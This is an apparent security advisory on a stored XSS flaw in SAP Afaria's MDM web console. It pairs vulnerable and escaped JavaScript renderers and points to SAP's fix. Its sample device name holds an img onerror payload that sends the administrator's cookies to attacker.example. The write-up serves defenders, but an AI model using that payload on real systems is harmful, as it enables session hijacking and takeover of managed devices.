The problem with SAP Afaria

Hello everybody!

SAP Afaria, an MDM solution from a world-famous software vendor, appears to have security issues: it can be attacked in several ways through a stored XSS vulnerability.

In brief, MDM (Mobile Device Management) is a set of services used to control mobile devices such as smartphones, tablets and phablets, and to enforce security measures on the corporate data stored and processed on those devices. The software is designed to help company administrators accomplish these tasks. A special application, the MDM client, is installed on each device and lets administrators push settings to it.

Afaria is used globally, and about 140 Afaria servers are reachable from the Internet; the US and China have the largest numbers of them.

Several SAP Afaria vulnerabilities have been discovered; the stored XSS is discussed here.

The administrative part of SAP Afaria provides the core functionality and is reached through a browser. From the web console a system administrator can view the list of all connected devices, create new mobile device configurations, deploy applications, control devices, and so on. This is where the XSS vulnerability sits. Although other users have no access to these functions, user-supplied data can still be injected into what the console displays, so a stored payload ends up executing in the administrator's browser. That exposes the whole system, and the administrator account in particular.
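As an added illustration (not code from the original post or from SAP; the post does not say which Afaria field was affected), the following JavaScript models how a stored XSS in an MDM console works: a hypothetical device-controlled field (the device name) is stored at enrollment and later rendered into the administrator's device list. The device records, the attacker.example domain and all function names are constructed for the example. The vulnerable renderer is shown beside the hardened one, plus a small check that flags device-supplied markup surviving unescaped in the rendered page.

```javascript
// Added example (not from the original post or from SAP): a minimal model of
// stored XSS reaching an MDM administrator. Field names, function names and
// attacker.example are hypothetical.

// Constructed sample records. The second "device" carries a payload in a field
// the device itself controls at enrollment, which is exactly the kind of input
// an unauthenticated party can get stored without ever seeing the admin console.
const enrolledDevices = [
  { id: 1001, name: "Alice iPhone", os: "iOS 8.1" },
  {
    id: 1002,
    name: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    os: "Android 4.4",
  },
];

// Vulnerable rendering: device-supplied strings are concatenated into the
// console's HTML verbatim, so the payload runs in the administrator's browser
// with the administrator's session.
function renderDeviceRowUnsafe(device) {
  return `<tr><td>${device.id}</td><td>${device.name}</td><td>${device.os}</td></tr>`;
}

// Escaping for the HTML text and double-quoted attribute contexts used below.
// Covers & < > " ' and backtick so a value cannot close a tag, an attribute
// or a template on its way into the page.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "`": "&#96;" };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// Hardened rendering: every device-controlled value is escaped at the point it
// is written into HTML. The fix lives at the output, not at storage time, so it
// also neutralizes payloads that were stored before the fix shipped.
function renderDeviceRowSafe(device) {
  return `<tr><td>${escapeHtml(device.id)}</td><td>${escapeHtml(device.name)}</td><td>${escapeHtml(device.os)}</td></tr>`;
}

function renderDeviceTable(devices, renderRow) {
  return `<table>${devices.map(renderRow).join("")}</table>`;
}

// Review check: which device-supplied names containing markup characters appear
// verbatim in the rendered page? Anything returned here is a stored XSS sink.
function findUnescapedInputs(html, devices) {
  return devices
    .map((d) => String(d.name))
    .filter((name) => /[<>"']/.test(name) && html.includes(name));
}

// Stand-alone run: compare the two renderers on the same stored records.
const unsafeHtml = renderDeviceTable(enrolledDevices, renderDeviceRowUnsafe);
const safeHtml = renderDeviceTable(enrolledDevices, renderDeviceRowSafe);
console.log("unescaped inputs (vulnerable):", findUnescapedInputs(unsafeHtml, enrolledDevices));
console.log("unescaped inputs (hardened):  ", findUnescapedInputs(safeHtml, enrolledDevices));
```

The point to take from the example is the attack path rather than the code: the injecting party never needs console access, only the ability to get a string stored by a component (here, device enrollment) that the console later trusts and renders, which is why an XSS confined to an admin-only page can still be an unauthenticated remote issue.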


Stored XSS vulnerability: Wrap-up

The XSS vulnerability was closed by SAP. Install SAP Note 2152669 to fix this issue.

This flaw can be exploited remotely without authentication, and at least 140 of these servers are reachable from the Internet. An attacker could gain complete control over all of an organization's mobile devices: remotely wipe data, lock every smartphone, or even force the installation of a malicious backdoor that takes over the user's data, sends critical documents to a C&C server, spies on employees, reads messages and records video from the cameras.


See the detailed analysis with screenshots at the source: Akati
